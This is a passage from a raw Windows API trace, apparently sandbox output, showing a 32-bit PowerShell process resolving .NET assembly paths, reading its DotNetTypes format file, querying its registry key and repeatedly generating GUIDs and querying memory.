lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0151.790] GetLastError () returned 0x57 [0151.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.790] GetLastError () returned 0x57 [0151.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.790] GetLastError () returned 0x57 [0151.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.790] GetLastError () returned 0x57 [0151.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.790] GetLastError () returned 0x57 [0151.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.791] GetLastError () returned 0x57 [0151.956] VirtualQuery (in: lpAddress=0x23d220, lpBuffer=0x23e220, dwLength=0x1c | out: lpBuffer=0x23e220*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.963] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x7dcc12a9, Data2=0x4154, Data3=0x4434, Data4=([0]=0xad, [1]=0xf2, [2]=0xaa, [3]=0xa7, [4]=0x75, [5]=0x66, [6]=0x37, [7]=0xad))) returned 0x0 [0151.964] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xdf0a07bf, Data2=0xa23, Data3=0x472e, Data4=([0]=0x91, [1]=0x30, [2]=0x17, [3]=0x58, [4]=0x98, [5]=0x8e, [6]=0x3e, [7]=0xf6))) returned 0x0 [0151.964] VirtualQuery (in: lpAddress=0x23d298, lpBuffer=0x23e298, dwLength=0x1c | out: lpBuffer=0x23e298*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.964] VirtualQuery (in: lpAddress=0x23d298, lpBuffer=0x23e298, dwLength=0x1c | out: lpBuffer=0x23e298*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.964] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xd198dc5a, Data2=0xae25, Data3=0x4afd, Data4=([0]=0x84, [1]=0xe5, [2]=0x9a, [3]=0x7b, [4]=0x14, [5]=0xfd, [6]=0x53, [7]=0x4e))) returned 0x0 [0151.968] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x9e22dd81, Data2=0x5fab, Data3=0x4d9b, Data4=([0]=0xbf, [1]=0xe0, [2]=0xd, [3]=0x7, [4]=0x64, [5]=0x57, [6]=0x6d, [7]=0x6b))) returned 0x0 [0151.968] VirtualQuery (in: lpAddress=0x23d3c4, lpBuffer=0x23e3c4, dwLength=0x1c | out: lpBuffer=0x23e3c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.968] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.968] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.968] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x1ad6ea43, Data2=0x8243, Data3=0x49ec, Data4=([0]=0x8e, [1]=0x24, [2]=0x47, [3]=0x77, [4]=0xa1, [5]=0xfd, [6]=0x4f, [7]=0x2d))) returned 0x0 [0151.968] VirtualQuery (in: lpAddress=0x23d3c4, lpBuffer=0x23e3c4, dwLength=0x1c | out: lpBuffer=0x23e3c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.969] VirtualQuery (in: lpAddress=0x23d2dc, lpBuffer=0x23e2dc, dwLength=0x1c | out: lpBuffer=0x23e2dc*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.969] VirtualQuery (in: lpAddress=0x23cf90, lpBuffer=0x23df90, dwLength=0x1c | out: lpBuffer=0x23df90*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.969] VirtualQuery (in: lpAddress=0x23cf90, lpBuffer=0x23df90, dwLength=0x1c | out: lpBuffer=0x23df90*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.003] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x92541097, Data2=0x8528, Data3=0x4b8e, Data4=([0]=0xa4, [1]=0xd8, [2]=0x91, [3]=0x5d, [4]=0x9f, [5]=0x97, [6]=0xae, [7]=0x5b))) returned 0x0 [0152.003] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xc65a8584, Data2=0x2a90, Data3=0x41c8, Data4=([0]=0xbc, [1]=0xc, [2]=0xb8, [3]=0xe0, [4]=0x53, [5]=0xb, [6]=0x28, [7]=0x27))) returned 0x0 [0152.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23dfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0152.003] GetLastError () returned 0x57 [0152.003] SetErrorMode (uMode=0x1) returned 0x1 [0152.003] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c [0152.004] GetLastError () returned 0x0 [0152.004] GetFileType (hFile=0x34c) returned 0x1 [0152.004] SetErrorMode (uMode=0x1) returned 0x1 [0152.004] GetFileType (hFile=0x34c) returned 0x1 [0152.004] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.004] GetLastError () returned 0x0 [0152.004] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.004] GetLastError () returned 0x0 [0152.004] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.004] GetLastError () returned 0x0 [0152.004] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.004] GetLastError () returned 0x0 [0152.004] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.004] GetLastError () returned 0x0 [0152.004] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.005] GetLastError () returned 0x0 [0152.005] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.005] GetLastError () returned 0x0 [0152.005] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.005] GetLastError () returned 0x0 [0152.006] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.006] GetLastError () returned 0x0 [0152.006] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.006] GetLastError () returned 0x0 [0152.006] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.006] GetLastError () returned 0x0 [0152.006] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.006] GetLastError () returned 0x0 [0152.007] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.007] GetLastError () returned 0x0 [0152.007] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.007] GetLastError () returned 0x0 [0152.007] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.007] GetLastError () returned 0x0 [0152.007] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.007] GetLastError () returned 0x0 [0152.009] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0152.009] GetLastError () returned 0x0 [0152.009] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0xbce, lpOverlapped=0x0) returned 1 [0152.009] GetLastError () returned 0x0 [0152.010] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7a476, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7a476*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0152.010] GetLastError () returned 0x0 [0152.010] ReadFile (in: hFile=0x34c, lpBuffer=0x2c7ad08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2c7ad08*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0152.010] GetLastError () returned 0x0 [0152.010] CloseHandle (hObject=0x34c) returned 1 [0152.010] GetLastError () returned 0x0 [0152.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e0a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0152.010] GetLastError () returned 0x0 [0152.010] SetErrorMode (uMode=0x1) returned 0x1 [0152.010] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2c9bd04 | out: lpFileInformation=0x2c9bd04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0152.010] GetLastError () returned 0x0 [0152.010] SetErrorMode (uMode=0x1) returned 0x1 [0152.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0152.010] GetLastError () returned 0x0 [0152.010] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e4c8 | out: phkResult=0x23e4c8*=0x34c) returned 0x0 [0152.011] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x0, lpcbData=0x23e50c*=0x0 | out: lpType=0x23e510*=0x1, lpData=0x0, lpcbData=0x23e50c*=0x56) returned 0x0 [0152.011] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x357e88, lpcbData=0x23e50c*=0x56 | out: lpType=0x23e510*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x23e50c*=0x56) returned 0x0 [0152.011] RegCloseKey (hKey=0x34c) returned 0x0 [0152.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0152.011] GetLastError () returned 0x0 [0152.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e004, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0152.011] GetLastError () returned 0x0 [0152.012] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x1e3e714b, Data2=0xed6b, Data3=0x4cec, Data4=([0]=0x91, [1]=0x4c, [2]=0x9f, [3]=0x9, [4]=0xe2, [5]=0x11, [6]=0x12, [7]=0xd0))) returned 0x0 [0152.012] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x2a789e30, Data2=0xc1e2, Data3=0x475e, Data4=([0]=0x88, [1]=0xaa, [2]=0xb1, [3]=0x3, [4]=0x78, [5]=0xa6, [6]=0x2c, [7]=0x32))) returned 0x0 [0152.012] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x552fc928, Data2=0x29c4, Data3=0x4a59, Data4=([0]=0x9d, [1]=0x58, [2]=0xa2, [3]=0x4c, [4]=0xd3, [5]=0x9a, [6]=0x47, [7]=0xbf))) returned 0x0 [0152.012] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xa1d8abba, Data2=0x5159, Data3=0x4638, Data4=([0]=0xbb, [1]=0x27, [2]=0xf0, [3]=0x1a, [4]=0x1, [5]=0x5f, [6]=0x48, [7]=0x44))) returned 0x0 [0152.012] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x42be7943, Data2=0x9152, Data3=0x4c8f, Data4=([0]=0xba, [1]=0x28, [2]=0x90, [3]=0xa4, [4]=0x98, [5]=0xaa, [6]=0xb3, [7]=0x36))) returned 0x0 [0152.013] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x6f32ae8e, Data2=0xa7f6, Data3=0x4c2a, Data4=([0]=0xab, [1]=0xfd, [2]=0x7e, [3]=0xb1, [4]=0xe0, [5]=0x45, [6]=0x4c, [7]=0xaa))) returned 0x0 [0152.013] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.013] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x37a10532, Data2=0x1162, Data3=0x4503, Data4=([0]=0xb4, [1]=0x8c, [2]=0xfd, [3]=0x8e, [4]=0x7d, [5]=0xc4, [6]=0xad, [7]=0x9c))) returned 0x0 [0152.013] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.013] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.013] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x6300a496, Data2=0x7e2e, Data3=0x4f08, Data4=([0]=0x9c, [1]=0xb9, [2]=0x2, [3]=0x6f, [4]=0xf5, [5]=0xc, [6]=0xdd, [7]=0xb9))) returned 0x0 [0152.013] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x701c91e6, Data2=0x6d1, Data3=0x47c3, Data4=([0]=0xa5, [1]=0xa9, [2]=0xa1, [3]=0x2f, [4]=0xc6, [5]=0x54, [6]=0xfa, [7]=0xf2))) returned 0x0 [0152.013] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x5948d228, Data2=0xa3cd, Data3=0x4ab9, Data4=([0]=0x99, [1]=0x9d, [2]=0xfc, [3]=0x3e, [4]=0xb7, [5]=0x90, [6]=0x75, [7]=0xdc))) returned 0x0 [0152.013] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x7c75aa9a, Data2=0x229, Data3=0x4ee1, Data4=([0]=0xac, [1]=0x33, [2]=0x75, [3]=0x5c, [4]=0x98, [5]=0xa5, [6]=0x74, [7]=0x9d))) returned 0x0 [0152.014] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.014] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x4b2d9bde, Data2=0x14eb, Data3=0x4110, Data4=([0]=0x9f, [1]=0x49, [2]=0x23, [3]=0xd6, [4]=0xbc, [5]=0x89, [6]=0xf0, [7]=0x45))) returned 0x0 [0152.014] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.014] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.014] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.015] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.015] VirtualQuery (in: lpAddress=0x23d270, lpBuffer=0x23e270, dwLength=0x1c | out: lpBuffer=0x23e270*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.015] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xebece5e8, Data2=0xb309, Data3=0x40c9, Data4=([0]=0xac, [1]=0x7c, [2]=0xae, [3]=0xe8, [4]=0x8, [5]=0xb8, [6]=0x4f, [7]=0xfd))) returned 0x0 [0152.015] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x9c96ad96, Data2=0x9fd6, Data3=0x49f0, Data4=([0]=0x94, [1]=0x3, [2]=0xff, [3]=0x9a, [4]=0xbd, [5]=0x1e, [6]=0x66, [7]=0x31))) returned 0x0 [0152.016] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xce5f95a6, Data2=0xe8a9, Data3=0x4328, Data4=([0]=0x89, [1]=0xc3, [2]=0x18, [3]=0x7a, [4]=0x50, [5]=0xd5, [6]=0x59, [7]=0x1b))) returned 0x0 [0152.016] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x41c68503, Data2=0x710d, Data3=0x4a9d, Data4=([0]=0x88, [1]=0xd0, [2]=0x9f, [3]=0x42, [4]=0x1e, [5]=0xa3, [6]=0x65, [7]=0x59))) returned 0x0 [0152.016] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x57a4ff39, Data2=0xce1f, Data3=0x4a24, Data4=([0]=0x8d, [1]=0xd0, [2]=0x1a, [3]=0xfa, [4]=0x4d, [5]=0xa1, [6]=0x1, [7]=0x6f))) returned 0x0 [0152.016] VirtualQuery (in: lpAddress=0x23d3c4, lpBuffer=0x23e3c4, dwLength=0x1c | out: lpBuffer=0x23e3c4*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.016] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x718be329, Data2=0x8ca6, Data3=0x4e93, Data4=([0]=0x97, [1]=0x8a, [2]=0xea, [3]=0xd6, [4]=0x91, [5]=0x78, [6]=0x18, [7]=0x3b))) returned 0x0 [0152.016] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x551911ff, Data2=0xc6cc, Data3=0x4152, Data4=([0]=0xbe, [1]=0xd0, [2]=0x83, [3]=0xdd, [4]=0x8b, [5]=0xd0, [6]=0x5f, [7]=0xd3))) returned 0x0 [0152.016] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xb51ca7eb, Data2=0xe82e, Data3=0x481e, Data4=([0]=0xbd, [1]=0x9d, [2]=0x62, [3]=0xe1, [4]=0xc4, [5]=0xdb, [6]=0x3b, [7]=0x5c))) returned 0x0 [0152.016] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xa5f77ba, Data2=0x1cd2, Data3=0x4298, Data4=([0]=0x91, [1]=0xa9, [2]=0xe1, [3]=0x6f, [4]=0x1, [5]=0x88, [6]=0x91, [7]=0x7c))) returned 0x0 [0152.017] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x936accd6, Data2=0x80bb, Data3=0x4e1d, Data4=([0]=0x94, [1]=0x97, [2]=0xb0, [3]=0x37, [4]=0x97, [5]=0x1e, [6]=0x5c, [7]=0x43))) returned 0x0 [0152.017] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x7f07fda6, Data2=0x83aa, Data3=0x4b65, Data4=([0]=0xab, [1]=0x3f, [2]=0xc7, [3]=0x2a, [4]=0x4c, [5]=0x97, [6]=0x2a, [7]=0x61))) returned 0x0 [0152.017] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xc28083bf, Data2=0x6f2c, Data3=0x46e5, Data4=([0]=0xb1, [1]=0x92, [2]=0xa, [3]=0x2e, [4]=0xf8, [5]=0xc2, [6]=0xe5, [7]=0xc4))) returned 0x0 [0152.017] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xfe13cdac, Data2=0x3079, Data3=0x4252, Data4=([0]=0xa9, [1]=0x94, [2]=0x88, [3]=0xa0, [4]=0xcc, [5]=0xd4, [6]=0x99, [7]=0x99))) returned 0x0 [0152.017] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x198eac91, Data2=0x3acb, Data3=0x4e3d, Data4=([0]=0x92, [1]=0xed, [2]=0xad, [3]=0x80, 